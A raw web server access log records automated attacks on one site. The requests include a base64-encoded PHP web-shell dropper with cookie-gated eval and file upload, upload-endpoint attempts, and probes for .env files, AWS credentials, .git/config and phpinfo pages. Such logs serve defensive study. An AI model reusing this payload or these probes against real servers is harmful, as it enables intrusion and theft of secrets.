37.112.219.146 - - [08/Dec/2025:10:43:36 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; Trident/6.0)"
37.112.219.146 - - [08/Dec/2025:10:43:26 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; Trident/6.0)"
37.112.219.146 - - [08/Dec/2025:10:32:21 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.219.146 - - [08/Dec/2025:10:32:22 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.219.146 - - [08/Dec/2025:10:32:22 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0"
43.135.115.233 - - [08/Dec/2025:10:32:28 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
37.112.219.146 - - [08/Dec/2025:10:32:57 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.219.146 - - [08/Dec/2025:10:32:57 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.219.146 - - [08/Dec/2025:10:43:25 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; Trident/6.0)"
37.112.219.146 - - [08/Dec/2025:10:43:26 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; Trident/6.0)"
37.112.219.146 - - [08/Dec/2025:10:43:34 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; Trident/6.0)"
43.135.148.92 - - [08/Dec/2025:10:46:38 +0000] "GET /seughtunghdyyshry/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.148.92 - - [08/Dec/2025:10:46:40 +0000] "GET /seughtunghdyyshry/admin/ HTTP/1.1" 302 0 "http://metalescrose.com/seughtunghdyyshry/admin" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [08/Dec/2025:10:52:10 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2671.25 Safari/537.36"
43.130.228.73 - - [08/Dec/2025:10:56:47 +0000] "GET /?ND HTTP/1.1" 200 1733 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
195.178.110.156 - - [08/Dec/2025:11:02:02 +0000] "GET / HTTP/1.1" 200 1727 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:03 +0000] "GET /_autoindex/assets/js/tablesort.number.js HTTP/1.1" 200 366 "-" "python-httpx/0.28.1"
194.68.32.135 - - [08/Dec/2025:11:02:01 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2929.58 Safari/537.36"
194.68.32.135 - - [08/Dec/2025:11:02:03 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2929.58 Safari/537.36"
195.178.110.156 - - [08/Dec/2025:11:02:04 +0000] "GET /.env.development HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
194.68.32.135 - - [08/Dec/2025:11:02:06 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2929.58 Safari/537.36"
194.68.32.135 - - [08/Dec/2025:11:02:06 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2929.58 Safari/537.36"
194.68.32.135 - - [08/Dec/2025:11:02:06 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2929.58 Safari/537.36"
195.178.110.156 - - [08/Dec/2025:11:02:10 +0000] "GET /api/.env HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:15 +0000] "GET /admin/phpinfo.php HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:03 +0000] "GET /_autoindex/assets/js/tablesort.js HTTP/1.1" 200 2300 "-" "python-httpx/0.28.1"
194.68.32.135 - - [08/Dec/2025:11:02:06 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2929.58 Safari/537.36"
195.178.110.156 - - [08/Dec/2025:11:02:09 +0000] "GET /.env.production HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:10 +0000] "GET /backend/.env HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:15 +0000] "GET /phpinfo.php HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:16 +0000] "GET /phpinfo HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:17 +0000] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:17 +0000] "GET /test.php HTTP/1.1" 200 158 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:23 +0000] "GET /settings.py HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:30 +0000] "GET /storage/logs/laravel.log HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:16 +0000] "GET /info.php HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:16 +0000] "GET /index.php/phpinfo HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:22 +0000] "GET / HTTP/1.1" 200 1727 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:23 +0000] "GET /.aws/credentials HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:23 +0000] "GET /config/database.yml HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:24 +0000] "GET /.env.js HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:24 +0000] "GET /debug.log HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:24 +0000] "GET /logs/error.log HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:24 +0000] "GET /laravel.log HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:24 +0000] "GET /logs/debug.log HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:30 +0000] "GET /wp-content/debug.log HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
43.135.148.92 - - [08/Dec/2025:10:46:39 +0000] "GET /seughtunghdyyshry/admin HTTP/1.1" 301 795 "http://metalescrose.com/seughtunghdyyshry/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.148.92 - - [08/Dec/2025:10:46:42 +0000] "GET /seughtunghdyyshry/admin/login HTTP/1.1" 200 0 "http://metalescrose.com/seughtunghdyyshry/admin/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [08/Dec/2025:10:52:09 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2671.25 Safari/537.36"
192.121.16.196 - - [08/Dec/2025:10:52:09 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2671.25 Safari/537.36"
192.121.16.196 - - [08/Dec/2025:10:52:34 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2671.25 Safari/537.36"
192.121.16.196 - - [08/Dec/2025:10:52:34 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2671.25 Safari/537.36"
192.121.16.196 - - [08/Dec/2025:10:52:34 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2671.25 Safari/537.36"
195.178.110.156 - - [08/Dec/2025:11:02:03 +0000] "GET /.git/config HTTP/1.1" 403 1242 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:04 +0000] "GET /.env HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:04 +0000] "GET /.env.example HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:15 +0000] "GET /_profiler/phpinfo HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:16 +0000] "GET /symfony/_profiler/phpinfo HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:17 +0000] "GET /dashboard/info.php HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
195.178.110.156 - - [08/Dec/2025:11:02:23 +0000] "GET /logs/debug.log HTTP/1.1" 404 1251 "-" "python-httpx/0.28.1"
4.189.112.79 - - [08/Dec/2025:11:05:56 +0000] "GET /.well-known/acme-challenge/file.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:56 +0000] "GET /.well-known/acme-challenge/wp-login.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:05:56 +0000] "GET /.well-known/pki-validation/index.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:05:56 +0000] "GET /1.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:57 +0000] "GET /aa.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:57 +0000] "GET /abcd.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:57 +0000] "GET /about.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:05:57 +0000] "GET /.well-known/index.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:57 +0000] "GET /admin.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:57 +0000] "GET /adminfuns.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:58 +0000] "GET /alfa.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:05:58 +0000] "GET /api.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:58 +0000] "GET /autoload_classmap/function.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:58 +0000] "GET /bless.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:58 +0000] "GET /cgi-bin/index.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:05:59 +0000] "GET /classwithtostring.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:59 +0000] "GET /edit.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:05:59 +0000] "GET /file.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:05:59 +0000] "GET /goods.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:59 +0000] "GET /info.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:05:59 +0000] "GET /ioxi-o.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:00 +0000] "GET /manager.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:00 +0000] "GET /mini HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:00 +0000] "GET /wp-user.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.189.112.79 - - [08/Dec/2025:11:06:01 +0000] "GET /wp.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.189.112.79 - - [08/Dec/2025:11:06:01 +0000] "GET /xmrlpc.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:01 +0000] "GET /ahax.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:01 +0000] "GET /akcc.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:01 +0000] "GET /assets/ HTTP/1.1" 200 1555 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
